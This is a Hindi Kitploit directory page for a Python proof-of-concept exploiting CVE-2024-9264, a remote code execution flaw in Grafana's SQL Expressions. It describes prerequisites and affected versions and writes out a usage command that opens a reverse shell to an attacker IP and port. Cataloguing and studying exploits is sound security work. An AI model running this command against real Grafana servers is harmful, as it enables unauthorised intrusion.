Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264 — Grafana में SQL एक्सप्रेशन के माध्यम से दूरस्थ कोड निष्पादन के लिए Python प्रमाण-अवधारणा, प्रमाणित लक्ष्यों पर मनमाना शेल कमांड निष्पादित करने के लिए अपर्याप्त इनपुट स्वच्छता का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/royall-researchers/cve-2024-9264
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubroyall-researchers/cve-2024-9264

CVE-2024-9264

Grafana में SQL एक्सप्रेशन के माध्यम से दूरस्थ कोड निष्पादन के लिए Python प्रमाण-अवधारणा, प्रमाणित लक्ष्यों पर मनमाना शेल कमांड निष्पादित करने के लिए अपर्याप्त इनपुट स्वच्छता का शोषण करता है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9264-RCE-एक्सप्लॉइट ग्राफाना में SQL एक्सप्रेशन के माध्यम से

विवरण

ग्राफाना (CVE-2024-9264) में रिमोट कोड निष्पादन के लिए प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो ग्राफाना के SQL एक्सप्रेशन सुविधा में रिमोट कोड निष्पादन (RCE) कमजोरी का शोषण करती है। अपर्याप्त इनपुट स्वच्छता का लाभ उठाकर, यह शोषण एक हमलावर को सर्वर पर मनमाने शेल कमांड निष्पादित करने की अनुमति देता है। यह shellfs कम्युनिटी एक्सटेंशन के माध्यम से संभव है, जिसे एक हमलावर द्वारा स्थापित और लोड किया जा सकता है ताकि कमांड निष्पादन की सुविधा हो सके।

पूर्वापेक्षाएँ

  • प्रमाणित ग्राफाना उपयोगकर्ता जिसके पास Viewer अनुमतियाँ या उच्चतर हों
  • DuckDB बाइनरी स्थापित होनी चाहिए और ग्राफाना के PATH के माध्यम से सुलभ होनी चाहिए

प्रभावित संस्करण

ग्राफाना >= v11.0.0 (सभी v11.x.y प्रभावित हैं)

उपयोग

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

उदाहरण

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

अस्वीकरण

यह स्क्रिप्ट शैक्षिक उद्देश्यों और नियंत्रित वातावरणों में उपयोग के लिए है जहां आपके पास सिस्टम की सुरक्षा का परीक्षण करने की अनुमति है। इस उपकरण के दुरुपयोग से कानूनी परिणाम हो सकते हैं।

और अधिक

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

टूल डाउनलोड करें